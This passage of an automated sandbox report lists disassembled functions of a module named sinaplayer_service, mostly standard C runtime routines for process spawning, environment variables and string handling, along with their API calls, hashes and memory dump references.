                                                                                                                                                                                                      • Part of subcall function 6D125072: _errno.MSVCR120(6D125150,00000010,6D0FF6AB,00000000,00000000,00000000,?,00000000,?,?,?,6D0FFF5D,00000000,00000000,00000000,00000000), ref: 6D12509C
                                                                                                                                                                                                      • Part of subcall function 6D125072: _invalid_parameter_noinfo.MSVCR120(6D125150,00000010,6D0FF6AB,00000000,00000000,00000000,?,00000000,?,?,?,6D0FFF5D,00000000,00000000,00000000,00000000), ref: 6D1250A6
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D105DBC
                                                                                                                                                                                                      • Part of subcall function 6D12469B: IsProcessorFeaturePresent.KERNEL32(00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000,00000000,00000000,00000000,6D0FB412), ref: 6D12469D
                                                                                                                                                                                                      • Part of subcall function 6D12469B: __crtTerminateProcess.MSVCR120(C0000417,00000002,C0000417,00000001,?,00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000), ref: 6D1246BC
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,00000044), ref: 6D105DE4
                                                                                                                                                                                                    • strlen.MSVCR120(?), ref: 6D105E33
                                                                                                                                                                                                    • strlen.MSVCR120(?,?), ref: 6D105E3D
                                                                                                                                                                                                    • strlen.MSVCR120( /c ,?,?), ref: 6D105E49
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000000,00000001, /c ,?,?), ref: 6D105E56
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,?,?), ref: 6D105E72
                                                                                                                                                                                                    • strcat_s.MSVCR120(00000000,?, /c ), ref: 6D105E8B
                                                                                                                                                                                                    • strcat_s.MSVCR120(00000000,?,?), ref: 6D105EA2
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,00000010), ref: 6D105EB9
                                                                                                                                                                                                    • _errno.MSVCR120(?,00000000,00000010), ref: 6D105EBE
                                                                                                                                                                                                    • __access_s.LIBCMT(?,00000000,?,00000000,00000010), ref: 6D105ECD
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,?), ref: 6D105EF0
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000104,00000001), ref: 6D105F07
                                                                                                                                                                                                    • free.MSVCR120(00000000,00000000), ref: 6D105F1B
                                                                                                                                                                                                    • free.MSVCR120(?,00000000,00000000), ref: 6D105F23
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D105F2B
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D105F15
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • __wdupenv_s.LIBCMT(00000000,00000000,PATH), ref: 6D105F45
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D106078
                                                                                                                                                                                                    • free.MSVCR120(?,00000000), ref: 6D106080
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6D106090
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6D106099
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D10609B
                                                                                                                                                                                                    • fclose.MSVCR120(00000000), ref: 6D1060BD
                                                                                                                                                                                                    • _close.MSVCR120(?), ref: 6D1060E0
                                                                                                                                                                                                    • _close.MSVCR120(?), ref: 6D1060F1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _close_errnofree$HandleProcessstrlen$Close__wdupenv_s_calloc_crt_invalid_parameter_noinfo_lockmemsetstrcat_s$CreateCurrentDuplicateFeatureFreeHeapPresentProcessorTerminate__access_s__crt__pipe_fdopen_idtab_invoke_watsonfclosestrcpy_s
                                                                                                                                                                                                    • String ID: /c $COMSPEC$PATH$cmd.exe$w$l\
                                                                                                                                                                                                    • API String ID: 1434950611-2188043720
                                                                                                                                                                                                    • Opcode ID: 9037358168b627029ab14fa7428e55c9eb3a012f1c89a55bf77343728cd3ad32
                                                                                                                                                                                                    • Instruction ID: 506e72b083c8717d50dc4ea9f0bc8706f1a7daa761f7e59b3695dcefc25c7f0d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9037358168b627029ab14fa7428e55c9eb3a012f1c89a55bf77343728cd3ad32
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FE10771D0421AABFF11AFA4DC40BFE7BB8AF1A354F114029FA14E7149EFB189418B91
                                                                                                                                                                                                    Function 6D0A6B1C Relevance: 57.9, APIs: 27, Strings: 6, Instructions: 192libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,.im,00000006,?,?,?,?,?,6D0A6C5D), ref: 6D0A6B29
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 6D0A6B3D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 6D0A6B48
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentProcessorNumberEx,?,?,?,?,?,6D0A6C5D), ref: 6D0A6B77
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6D0A6B7E
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,6D0A6C5D), ref: 6D0A6B9C
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,6D0A6C5D), ref: 6D0D1FEB
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2007
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2015
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D201B
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2031
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D203F
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2045
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D205B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2069
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D206F
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20B5
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C9
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20DF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20ED
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20F3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrow$AddressProc$HandleModuleVersion@$Concurrency@@Manager@1@Resource
                                                                                                                                                                                                    • String ID: .im$GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$]lm$kernel32.dll
                                                                                                                                                                                                    • API String ID: 2361529535-95723099
                                                                                                                                                                                                    • Opcode ID: 3fc7d8cc432b3c71db8f0c4a5e614fbe64d63227ef27981d4903c30469fa1b1c
                                                                                                                                                                                                    • Instruction ID: 10f02e053c71f4143d12e83430b245ac520d3a88749a5fab59e6631c3e89c8a3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fc7d8cc432b3c71db8f0c4a5e614fbe64d63227ef27981d4903c30469fa1b1c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB51DE75608256AFFB10DBB6D848BBFBBB8BF45340F10441AFA05E7146DB71D900CAA5
                                                                                                                                                                                                    Function 6D0B2135 Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 210COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0B216B
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0B2175
                                                                                                                                                                                                    • _wspawnve.MSVCR120(?,?,?,?), ref: 6D0B2186
                                                                                                                                                                                                      • Part of subcall function 6D0B2085: wcsrchr.MSVCR120(?,0000005C), ref: 6D0B20BB
                                                                                                                                                                                                      • Part of subcall function 6D0B2085: wcsrchr.MSVCR120(?,0000002F,?,0000005C), ref: 6D0B20C5
                                                                                                                                                                                                      • Part of subcall function 6D0B2085: wcsrchr.MSVCR120(00000000,0000002E), ref: 6D0B20E4
                                                                                                                                                                                                      • Part of subcall function 6D0B2085: _waccess_s.MSVCR120(?,00000000), ref: 6D0B20F6
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0B219C
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0B21A7
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0B21CC
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4D25
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D4D30
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D4D43
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4D50
                                                                                                                                                                                                    • wcschr.MSVCR120(?,0000002F), ref: 6D0D4D63
                                                                                                                                                                                                    • _wdupenv_s.MSVCR120(?,00000000,PATH), ref: 6D0D4D7C
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000104,00000002), ref: 6D0D4DA6
                                                                                                                                                                                                    • wcslen.MSVCR120(00000000), ref: 6D0D4DD1
                                                                                                                                                                                                    • wcscat_s.MSVCR120(00000000,00000104,6D0E218C), ref: 6D0D4DF9
                                                                                                                                                                                                    • wcslen.MSVCR120(00000000), ref: 6D0D4E0A
                                                                                                                                                                                                    • wcslen.MSVCR120(?,00000000), ref: 6D0D4E12
                                                                                                                                                                                                    • wcscat_s.MSVCR120(00000000,00000104,?), ref: 6D0D4E2B
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4E3B
                                                                                                                                                                                                    • _wspawnve.MSVCR120(?,00000000,?,?), ref: 6D0D4E4E
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4E64
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6D0D4E6E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$wcslenwcsrchr$_invalid_parameter_noinfo_wspawnvewcscat_s$__doserrno_calloc_crt_waccess_s_wdupenv_swcschr
                                                                                                                                                                                                    • String ID: PATH
                                                                                                                                                                                                    • API String ID: 2749365969-1036084923
                                                                                                                                                                                                    • Opcode ID: 322e91e0ee0d765fb9bca7358e70db31d6aaf0a578fcc8886d08e95d62e5b1c6
                                                                                                                                                                                                    • Instruction ID: cc259fa21ac64f0abf0245d11d35c72096207259f57c330ad4e227efb57ba2c4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 322e91e0ee0d765fb9bca7358e70db31d6aaf0a578fcc8886d08e95d62e5b1c6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69513735908303BEFB256B74880177E76F8EF1A324F521626FA609B1C0EB7289818661
                                                                                                                                                                                                    Function 6D0B0FC8 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 222stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcsnlen.LIBCMT(?,00007FFF,?,?,00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0B0FF0
                                                                                                                                                                                                    • _wcsnlen.LIBCMT(?,00007FFF,?,00007FFF,?,?,00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0B0FFA
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(-00000002,00000002), ref: 6D0B1021
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,?,?), ref: 6D0B1038
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6D0B108E
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6D0B10AD
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000000,00000001), ref: 6D0B10BD
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6D0B10DC
                                                                                                                                                                                                    • strlen.MSVCR120(?), ref: 6D0B10ED
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 6D0B110B
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0B1133
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,?,?,00000000,?,?), ref: 6D0B1056
                                                                                                                                                                                                      • Part of subcall function 6D091693: _errno.MSVCR120(?,?,6D0FBEB4,6D163568,00000314,Runtime Error!Program: ,?,?,?), ref: 6D0916D5
                                                                                                                                                                                                      • Part of subcall function 6D091693: _invalid_parameter_noinfo.MSVCR120(?,?,6D0FBEB4,6D163568,00000314,Runtime Error!Program: ,?,?,?), ref: 6D0D634D
                                                                                                                                                                                                      • Part of subcall function 6D0B120C: wcschr.MSVCR120(?,0000003D,00000000,?,005C2A20), ref: 6D0B1232
                                                                                                                                                                                                      • Part of subcall function 6D0B120C: free.MSVCR120(?,00000000,?,005C2A20), ref: 6D0B1296
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0DFD29
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0DFD34
                                                                                                                                                                                                    • wcschr.MSVCR120(?,0000003D,?,?,00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0DFD46
                                                                                                                                                                                                    • _wcsnlen.LIBCMT(-00000002,00007FFF,?,?,00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0DFD6A
                                                                                                                                                                                                    • wcslen.MSVCR120(?,?,?,00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0DFD76
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000002,?,?,?,00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0DFD81
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,00000001,?), ref: 6D0DFD97
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0DFDA4
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0DFDAF
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0DFDCB
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0DFDEE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide_errno$_calloc_crt_invalid_parameter_noinfo_wcsnlenfreewcscpy_s$wcschr$strlenwcslen
                                                                                                                                                                                                    • String ID: *\
                                                                                                                                                                                                    • API String ID: 3308320376-3401207301
                                                                                                                                                                                                    • Opcode ID: 7a998d5dd07bf1253bba737079b464ea9b7422ee5cdb5b2d1c327c8dd17983fd
                                                                                                                                                                                                    • Instruction ID: b4c9bb6f24791415ba1fd0c1670be1c4442ad7aa494cca60ffa4cc31aac7eaba
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a998d5dd07bf1253bba737079b464ea9b7422ee5cdb5b2d1c327c8dd17983fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B51F771A1C206BEFF114A74DC45F7B3AADEF46364F21852AF924DB1C0EB71C94086A6
                                                                                                                                                                                                    Function 6D0B0F2D Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 229stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _mbschr.MSVCR120(00000000,0000003D,005C2D90,00000000,00000000,00000000), ref: 6D0B0F4E
                                                                                                                                                                                                      • Part of subcall function 6D0B12F9: _mbschr_l.MSVCR120(00000000,005C2D90,00000000,?,6D0B0F53,00000000,0000003D,005C2D90,00000000,00000000,00000000), ref: 6D0B1304
                                                                                                                                                                                                    • free.MSVCR120(00000000,005C2D90,00000000,00000000,00000000), ref: 6D0B0FA9
                                                                                                                                                                                                    • _errno.MSVCR120(005C2D90,00000000,00000000,00000000), ref: 6D0B0FBE
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000), ref: 6D0E05EA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000000), ref: 6D0E05F5
                                                                                                                                                                                                    • ___wtomb_environ.LIBCMT ref: 6D0E0626
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004,005C2D90,00000000,00000000,00000000), ref: 6D0E064D
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004,005C2D90,00000000,00000000,00000000), ref: 6D0E066A
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,005C2D90,00000000,00000000,00000000), ref: 6D0E0698
                                                                                                                                                                                                    • __recalloc_crt.LIBCMT(00000001,00000004,005C2D90,00000000,00000000,00000000), ref: 6D0E06CE
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,00000001,?,00000000,00000000), ref: 6D0E0735
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(-00000002,00000001,?,00000000,00000000), ref: 6D0E073F
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,00000000,?,00000000,00000000), ref: 6D0E074E
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,-00000002,00000000,?,00000000,00000000), ref: 6D0E0759
                                                                                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 6D0E077C
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,00000000,00000000), ref: 6D0E078A
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,?,00000000,00000000), ref: 6D0E0796
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000,00000000), ref: 6D0E07A3
                                                                                                                                                                                                      • Part of subcall function 6D0B0EE6: _mbsnbicoll.MSVCR120(00000000,00000000,005C2D90,005C2A20,00000000,?,6D0B0F92,00000000,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0B0F01
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 6D0E07BB
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$_errno$_malloc_crtstrlen$EnvironmentVariable___wtomb_environ__recalloc_crt_calloc_crt_invalid_parameter_noinfo_invoke_watson_mbschr_mbschr_l_mbsnbicollstrcpy_s
                                                                                                                                                                                                    • String ID: *\
                                                                                                                                                                                                    • API String ID: 1943959764-3401207301
                                                                                                                                                                                                    • Opcode ID: c17c74437d8ed667f9bdb87f4b3ff66a5582d16814955e66a47e0a7ca757cc51
                                                                                                                                                                                                    • Instruction ID: 6040d0e6dab4c525f5717a4dc151574721d49d4d1523e8ee72ffd600b77b1784
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c17c74437d8ed667f9bdb87f4b3ff66a5582d16814955e66a47e0a7ca757cc51
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA71F572A0C313EFFB018B76D941B6E77B4AB423A4F114119E960DB190DB7AD941CB91
                                                                                                                                                                                                    Function 6D0B2085 Relevance: 36.2, APIs: 24, Instructions: 202COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcsrchr.MSVCR120(?,0000005C), ref: 6D0B20BB
                                                                                                                                                                                                    • wcsrchr.MSVCR120(?,0000002F,?,0000005C), ref: 6D0B20C5
                                                                                                                                                                                                    • wcsrchr.MSVCR120(00000000,0000002E), ref: 6D0B20E4
                                                                                                                                                                                                    • _waccess_s.MSVCR120(?,00000000), ref: 6D0B20F6
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0B2126
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D4BAA
                                                                                                                                                                                                    • wcschr.MSVCR120(?,0000003A), ref: 6D0D4BBA
                                                                                                                                                                                                    • wcslen.MSVCR120(?), ref: 6D0D4BCC
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000003,00000002,?), ref: 6D0D4BD7
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,00000003,6D0E2178), ref: 6D0D4BEC
                                                                                                                                                                                                    • wcscat_s.MSVCR120(00000000,00000003,?), ref: 6D0D4BFF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsrchr$_calloc_crt_errno_invalid_parameter_noinfo_waccess_swcscat_swcschrwcscpy_swcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 501526102-0
                                                                                                                                                                                                    • Opcode ID: f1956672354d29cfa819adfddcc213eb90ba766a1e36ab75fdacfc9527dd3864
